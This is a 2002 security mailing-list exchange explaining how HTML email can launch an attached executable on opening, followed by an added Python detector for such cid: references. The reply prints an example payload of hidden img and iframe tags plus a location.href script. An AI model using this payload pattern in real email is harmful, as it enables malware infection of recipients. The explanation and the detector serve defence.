-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Roberto,

Hi!

A script can call an attached executable automatically by just
opening the email, not the attachment itself. This poses a security
risk. An example of such a script:

< img SRC="cid:mr.malware.to.you"; style="display:none">
< img id=W0W src="cid:malware.com"; style="display:none">< BR><
center>< h6>YOU!DORA< /h6>< /center>
< IFRAME id=malware width=10 height=10 style="display:none" ><
/IFRAME>

< script>
// 18.03.01 http://www.malware.com
malware.location.href=W0W.src
< /script>

where the first image is the executable. The second image is composed
of simple JavaScripting and ActiveX control.

What happens is, once the mail message is opened, the two 'embedded'
images are instantly transferred to the 'embedded' folder. Then, the
simple JavaScript: location.href automatically calls the second image
composed of another JavaScript and ActiveX control. Though out of
sight in the iframe, when these are triggered, the *.exe is run.

The *.exe and JavaScript and ActiveX control reside in the same
folder [the so-called "embedded" folder]; these are also
automatically called to the iframe.

- -Leo Martinez

- -----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, May 29, 2002 10:02 AM
To: [EMAIL PROTECTED]
Subject: Weird HTML email


I have been getting HTML email from different folks on one of my
accounts. They all are similar to the HTML below. Can someone tell me
what this email is all about? Does it pose a security threat?

- -Roberto Cahanap


<HTML><HEAD></HEAD><BODY>
<iframe src=cid:S2oyJYo06RO0 height=0 width=0>
</iframe>
<FONT></FONT></BODY></HTML>

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQA/AwUBPPXUGwYiKlr97dJ+EQJ4ogCfbxE02V2Qe4Zjz6DSIMxh3qVybA0AnRnR
+6y28kpNz6Xs4wsS8i1x5tGd
=XZid
-----END PGP SIGNATURE-----
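
The thread describes HTML mail whose iframe or img elements point at `cid:` parts, so that embedded content loads when the message is opened. As an added example (not part of the original posts), this Python check flags such references in a message at a mail gateway or during triage; the tag list, the file-extension list, the function names and the sample messages are assumptions constructed for illustration.

```python
import re
from email import message_from_bytes, policy
from email.message import EmailMessage

# Tag name + cid target for any src=cid:... attribute, quoted or not
CID_SRC = re.compile(r'<\s*(\w+)\b[^>]*?\bsrc\s*=\s*["\']?cid:([^"\'\s>;]+)', re.I)
ACTIVE_TAGS = {"iframe", "frame", "script", "object", "embed"}  # assumed list
EXEC_EXT = (".exe", ".scr", ".pif", ".com", ".bat")             # assumed list

def find_cid_autoload(raw: bytes):
    """Return (tag, cid, content_type, filename, reasons) for suspicious cid: references."""
    msg = message_from_bytes(raw, policy=policy.default)
    # Index every MIME part that carries a Content-ID header
    by_cid = {p["Content-ID"].strip("<> "): p for p in msg.walk() if p["Content-ID"]}
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        for tag, cid in CID_SRC.findall(part.get_content()):
            tag, target, reasons = tag.lower(), by_cid.get(cid), []
            ctype = target.get_content_type() if target else "missing"
            fname = (target.get_filename() or "") if target else ""
            if tag in ACTIVE_TAGS:
                reasons.append("active element loads an embedded part")
            if tag == "img" and target and not ctype.startswith("image/"):
                reasons.append("img points at a non-image part")
            if fname.lower().endswith(EXEC_EXT):
                reasons.append("target has an executable file name")
            if reasons:
                findings.append((tag, cid, ctype, fname, reasons))
    return findings

def build_sample(html: str, maintype: str, subtype: str, filename: str) -> bytes:
    """Constructed test message: HTML body plus one related part with a Content-ID."""
    msg = EmailMessage()
    msg["Subject"] = "constructed sample"
    msg.set_content(html, subtype="html")
    msg.add_related(b"constructed placeholder bytes", maintype=maintype,
                    subtype=subtype, cid="<part1@example.invalid>", filename=filename)
    return msg.as_bytes()

SUSPICIOUS = build_sample('<iframe src=cid:part1@example.invalid height=0 width=0></iframe>',
                          "application", "octet-stream", "sample.exe")
BENIGN = build_sample('<img src="cid:part1@example.invalid" alt="logo">',
                      "image", "png", "logo.png")

if __name__ == "__main__":
    for name, raw in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, find_cid_autoload(raw))
```

An ordinary inline image (an `img` whose `cid:` target is an `image/*` part) produces no finding, so the check separates normal embedded pictures from the pattern discussed in the thread.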
